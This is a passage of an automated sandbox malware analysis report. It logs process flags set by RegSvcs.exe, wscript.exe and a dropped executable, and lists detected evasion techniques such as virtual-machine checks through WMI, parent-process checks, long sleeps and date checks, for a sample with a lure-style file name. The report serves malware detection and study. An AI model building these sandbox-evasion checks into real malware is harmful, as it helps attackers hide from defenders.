Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 11_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear, 11_2_004019F0
Contains long sleeps (>= 3 min)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 600000 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599875 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599766 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599656 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599547 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599438 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599313 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599188 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599078 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598969 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598844 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597400 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597250 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597110 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596995 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596865 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596722 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596600 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596447 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596341 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596221 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596089 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595984 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595874 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595766 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595641 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595516 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595406 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595297 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595188 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595063 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 594938 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 594828 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 594718 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 594610 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 600000 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599891 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599778 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598308 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598171 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598033 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597907 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597782 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597634 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597428 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597205 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597079 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596782 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596656 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596547 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595354 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595250 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595074 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 594943 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 594805 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 594688 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 594563 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 594438 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 594328 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 594219 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 594094 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 593985 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 593860 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 593735 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 593610 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 593485 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 593360 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 593235 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 593110 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 592985 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 592860 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 592735 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 592610 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 592485 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 592360 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 592235 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 592110 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 591985 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 591860 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 591735 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 591610 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 591485 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 591360 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 591235 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 591110 Jump to behavior
Found WSH timer for Javascript or VBS script (likely evasive script)
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Window / User API: threadDelayed 1952 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Window / User API: threadDelayed 4375 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Window / User API: threadDelayed 6891 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Window / User API: threadDelayed 2924 Jump to behavior
Found evasive API chain (date check)
Source: C:\Users\user\AppData\Local\directory\name.exe Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
Found large amount of non-executed APIs
Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe API coverage: 4.7 %
Source: C:\Users\user\AppData\Local\directory\name.exe API coverage: 6.2 %
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
